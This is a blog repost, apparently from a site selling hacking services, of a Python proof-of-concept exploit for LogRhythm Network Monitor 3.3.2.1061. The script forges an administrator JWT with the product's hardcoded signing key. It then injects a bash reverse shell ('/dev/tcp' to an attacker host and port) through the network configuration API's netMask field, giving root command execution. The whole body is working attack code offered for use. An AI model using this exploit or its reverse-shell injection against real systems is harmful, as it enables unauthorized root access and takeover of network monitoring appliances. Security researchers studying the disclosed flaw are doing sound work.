Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863107451

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: LogRhythm Network Monitor Auth Bypass Root RCE
# Public Disclosure Date: 24 Apr 2017
# Author: Francesco Oddo
# Reference: http://security-assessment.com/files/documents/advisory/Logrhythm-NetMonitor-Advisory.pdf
# Software Link: https://logrhythm.com/network-monitor-freemium/
# Version: 3.3.2.1061 (latest) or below 
# Tested On: nm_install_3.3.2.1061.iso with Freemium License (SHA256 7978f84e9fb18e2fae95f77a263801ca89b4767c95154b9ea874032081b02ce1)
# Dependencies: `pip install PyJWT`

import json
import requests
import argparse
import time 
import jwt

def forge_jwt(rhost):
	print "[+] Forging JWT authentication token"
	key = 'Gluten-free 100% narwhal deserunt polaroid; quinoa keytar asymmetrical slow-carb plaid occaecat nostrud green juice dolor!'

	iat = time.time()
	exp = iat + 3600;

	body = json.loads('{"iat":1479893930,"exp":1479894830,"data":{"username":"admin","licensed":true,"role":"admin","timeToResetPass":false}}')
	body["iat"] = int(iat)
	body["exp"] = int(exp)

	token = jwt.encode(body, key, algorithm='HS512');
	return token

def command_inject(rhost, lhost, lport, gwhost, ifname):
	uri = "https://%s/data/api/configuration/" % rhost
	json_body = json.loads('{"type":"network","configurations":[{"name":"interface","value":"","isToggle":false},{"name":"method","value":true,"isToggle":true},{"name":"ipAddress","value":"","isToggle":false},{"name":"netMask","value":"255.255.255.0","isToggle":false},{"name":"gateway","value":"","isToggle":false},{"name":"dnsServers","value":"","isToggle":false},{"name":"searchDomains","value":"","isToggle":false}],"diffFields":["dnsServers"]}')
	payload = ";bash -i >& /dev/tcp/%s/%s 0>&1" % (lhost, lport)
        json_body["configurations"][0]["value"] = ifname
	json_body["configurations"][2]["value"] = rhost
	json_body["configurations"][3]["value"] = payload
	json_body["configurations"][4]["value"] = gwhost
	json_body["configurations"][5]["value"] = gwhost
	jwt = forge_jwt(rhost)
	auth_header = {'Token': jwt}
	print "[+] Initiating reverse shell via command injection at %s:%s" % (lhost, lport)
	requests.post(url=uri, json=json_body, headers=auth_header, verify=False)

if __name__ == '__main__':
	parser = argparse.ArgumentParser(description='LogRhythm Network Monitor Root Remote Command Execution PoC')
	parser.add_argument('--rhost', help='RHOST IP address')
	parser.add_argument('--lhost', help='LHOST IP address')
	parser.add_argument('--lport', help='LPORT')
	parser.add_argument('--gwhost', help='Gateway IP address')
    parser.add_argument('--ifname', help='Target Interface Identifier', default='enp0s3')
	args = parser.parse_args()

	command_inject(args.rhost, args.lhost, args.lport, args.gwhost, args.ifname)